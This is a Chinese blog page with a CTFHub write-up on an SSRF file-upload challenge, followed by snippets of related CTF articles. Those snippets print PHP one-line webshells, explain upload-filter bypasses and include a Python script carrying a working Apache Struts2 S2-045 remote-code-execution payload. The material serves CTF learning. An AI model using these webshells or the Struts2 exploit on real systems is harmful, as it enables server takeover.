CTFHUB-上传文件

最新推荐文章于 2024-08-28 02:10:36 发布
原创 最新推荐文章于 2024-08-28 02:10:36 发布 · 429 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客提及index.php文件源码,指出是通过该页面的curl进行文件传输,以Upload Webshell,POST数据包经两次url编码。

index.php文件的源码为:

<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
   exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
flag.php文件的源码为:
<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

Upload Webshell

<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>

我们可以看出是发一个文件,通过index.php页面的curl进行传输,POST的数据包经过两次url编码,最后结果为
请添加图片描述

CTFHub_文件上传
weixin_47443077的博客
08-06 758
CTFHub_文件上传 文章目录CTFHub_文件上传0x01 无验证0x02 js前端验证0x03 .htaccess0x04 MIME绕过0x05 00截断0x06 双写后缀 0x01 无验证 打开页面如图示: 上传一句话木马用蚁剑连接 <?php @eval($_POST[cmd]);?> 因为没有任何限制,就直接上传.php木马文件 上传成功,显示上传文件相对路径,用蚁剑连接 连接成功,可在/var/www/html下找到flag! 0x02 js前端验证 打开页面如图示:
CTFHub 文件上传
WXY17387209358的博客
02-04 1104
ctfhub文件上传无限制
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 2646
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
CTFHUB-web-文件上传
2301_79783285的博客
12-23 2367
htaccess是一个纯文本文件,存放着Apache服务器配置相关的指令。.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。.htaccess的用途范围主要针对当前目录。注意:.htaccess文件(特别注意这里文件名不可随意更改,因为 .htaccess 是配置文件)博主这里帮大家把坑踩了,蚁剑死活连不上的原因。
CTFHUB-文件上传-文件头检查
weixin_68416970的博客
08-02 731
CTFHUB技能树、文件上传漏洞、文件头检查的过关教程
ctfhub-web-文件上传
m0_52484587的博客
08-28 1133
● 一般来说,配置文件的作用范围都是全局的,但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess(分布式配置文件),● 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。● 是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。只能上传.jpg,.png,.gif三种格式的文件,前端上传jpg,修改数据包进行上传
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 992
CTFHUB技能树、SSRF、上传文件的通关教程
CtfHub-wp(web)
01-23
MIME类型校验绕过是通过篡改上传文件的Content-Type来欺骗服务器,使其接受原本不允许的文件类型。00截断是利用了某些系统在处理字符串时遇到`\00`字符会停止解析的特性,将PHP代码插入到其他文件类型中,然后通过`....
CTFHUB-文件上传
m0_64180167的博客
12-25 1580
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传
ctfhub 文件上传
ccfly1012的博客
09-14 886
目录 基础知识 一句话木马 绕过过滤php头的木马 图片马的制作 .htaccess 无验证: 前端验证: .htaccess 方法一: 方法二: MIME绕过 00截断 限制条件 绕过姿势 双写绕过 文件头检查 基础知识 一句话木马 <?php @eval($_POST['hack']) ?> 绕过过滤php头的木马 <script language="php">@eval($_POST['pass'])</script>
CTFHub文件上传
m0_63563528的博客
01-23 1392
CTFHub】web-文件上传
CTFHub文件上传
遇事不决冲冲冲
04-17 1474
MIME绕过 知识点 MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类,也就是我们抓包时常见的Content-Type。 常见的MIME类型,例如: 超文本
CTFHub-文件上传
m0_51589948的博客
07-10 602
CTFHub-文件上传 无验证 前端验证 .htaccess MIME绕过 文件头检查 00截断 双写后缀 无验证 打开靶场获取信息,为无限制的文件上传,随便写入一个php的一句话木马上传 上传成功并获取上传文件的相对路径 用post传参检测其是否连接成功,测试连接成功。 使用蚁剑连接 在目录中获取flag 前端验证 * .hatsccess MIME绕过 、 文件头检查 00截断 双写后缀 ...
CTF-Hub-文件上传
qq_60905276的博客
11-22 583
1.00截断 00截断通常用来绕过web软waf的白名单限制。 条件:php版本小于5.3.29 2.双写后缀绕过 用于只将文件后缀名,例如"php"字符串过滤的场合; 例如:上传时将Burpsuite截获的数据包中文件名【evil.php】改为【evil.pphphp】,那么过滤了第一个"php"字符串"后,开头的'p'和结尾的'hp'就组合又形成了【php】。 不过为什么老是报错呢? ...
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3586
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
ctfhub文件上传(特详解)
小宇的web博客
06-17 6640
ctfhub文件上传 1.无验证 1.查看题目,这里上传文件没有限制,直接写一个一句话木马写一个网站后门。方法为在记事本上写上以下的木马,然后改变后缀改为php 2.这里需要中国蚁剑来进行操作,这里请自行百度,打开中国蚁剑后右键添加数据,然后在url中输入访问这个文件所在位置的url,在密码上面输入hack(这里输入hack即可)。 3.添加后双击打开。 4.这里发现flag打开即可。 2.前端验证 1.前端靠JavaScript来进行验证,这里可以直接把火狐浏览器的JavaScript的功能
ctfhub-web进阶-apche
最新发布
11-17
由于没有具体的站内引用内容,以下是关于CTFhub平台Web进阶板块中与Apache相关的常见内容分析: ### 解题方法 - **Apache配置文件漏洞**:在CTF题目中,可能存在Apache配置文件(如`.htaccess`)配置不当的情况。例如,若允许`.htaccess`文件覆盖全局配置,攻击者可通过上传恶意的`.htaccess`文件来执行任意代码。解题时,需要利用文件上传漏洞上传包含恶意配置的`.htaccess`文件,然后再上传可执行的PHP等脚本文件,从而获取服务器权限。 ```python # 示例代码:模拟利用文件上传漏洞上传恶意文件 import requests url = "http://example.com/upload.php" files = {'file': open('malicious.htaccess', 'rb')} response = requests.post(url, files=files) if response.status_code == 200: print(".htaccess文件上传成功") ``` - **Apache解析漏洞**:某些版本的Apache存在解析漏洞,比如在特定配置下,当请求一个不存在的文件时,Apache会尝试从右向左解析文件扩展名。例如,对于文件`test.php.jpg`,若存在解析漏洞,可能会将其当作PHP文件解析。解题时,可上传一个文件名类似`test.php.jpg`的恶意PHP脚本,然后访问该文件,触发解析漏洞执行脚本。 ### 漏洞利用 - **Apache Struts2漏洞**:Struts2是一个常用的Java Web应用框架,若使用Apache服务器部署Struts2应用,且Struts2存在漏洞(如S2-045),攻击者可通过构造恶意请求来执行任意代码。攻击者可构造包含恶意OGNL表达式的请求头,发送给目标服务器,从而实现远程代码执行。 ```python import requests url = "http://example.com/struts2-app.action" headers = {'Content-Type': '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'} response = requests.get(url, headers=headers) print(response.text) ``` ### 学习资料 - **官方文档**:Apache官方文档是学习Apache的重要资料,它详细介绍了Apache的各种配置选项、模块使用方法等。可以在Apache官方网站(https://httpd.apache.org/docs/)上查看最新版本的文档。 - **安全博客和论坛**:一些安全博客和论坛(如安全客、先知社区等)会分享关于Apache安全漏洞的分析和利用方法,通过阅读这些文章可以深入了解Apache相关的安全知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值